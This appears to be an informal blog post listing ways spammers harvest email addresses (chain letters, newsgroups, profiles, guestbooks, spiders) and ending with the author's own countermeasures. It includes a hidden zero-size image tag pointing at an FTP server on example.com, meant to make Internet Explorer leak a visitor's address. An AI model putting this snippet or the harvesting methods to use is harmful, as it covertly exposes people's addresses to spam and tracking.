It is scary, how simple mail adresses are collected. I think we should have a closer look at how it might be done:
- Chain letters
Chain letters are a wonderful way of collecting as they traveled a while until you get them. Most people just hit the forward button and send it right away. The other mailadresses are sent with it – including your own
- Newsgroups and boards
Ok, nowadays newsgroups are pretty dead, but they still exist. They are something like a public mailbox. Everything posted in there usually got a valid mail adress.
- Messenger- and community profiles
You all know ICQ and similar messengers? They all offer profile pages. They can be harvested without much hassle by either spidering the webpage or (ab)using the internal search protocols.
Guestbooks were often used on private homepage for communication with the webmaster to leave a line like ‘great site’ – most often the names of the people leaving a comment are linked to their mailaddress.
A spider is an automated program surfing the web for collecting information – search engines use them to index your site. It is not a big hassle to make one that collects mailadresses while spidering around.
- Info leaks in software
Ok… this is really my favorite one. Just imagine you got Internet Explorer installed and some mail client. If you ‘surf’ to a ftp site, you are logged in there automatically as an anonymous user. Regarding the protocol, you are required to leave your mailaddress (which gets logged). Keeping that in mind, we can be nasty, letting the user load an image from an FTP server. For hiding it, we just keep it 0x0 px or transparent: <img src=”ftp://ftp.example.com/path/to/picture.gif” width=”0″ height=”0″ alt=”SpyImage”>
IE just passes on your mailaddress without a word of warning.
But how to prevent that? First of all – I got some junk addresses just for doing registrations and stuff, which I do not want to do with my main address. Next thing is, that I do not enter mail addresses on guestbooks or profiles if not required. The ones who want one, may have my message sink. Mailaddresses on my websites are never written in plaintext for easy spidering. Regarding the FTP issue…. I am not aware that there is an IE version for linux…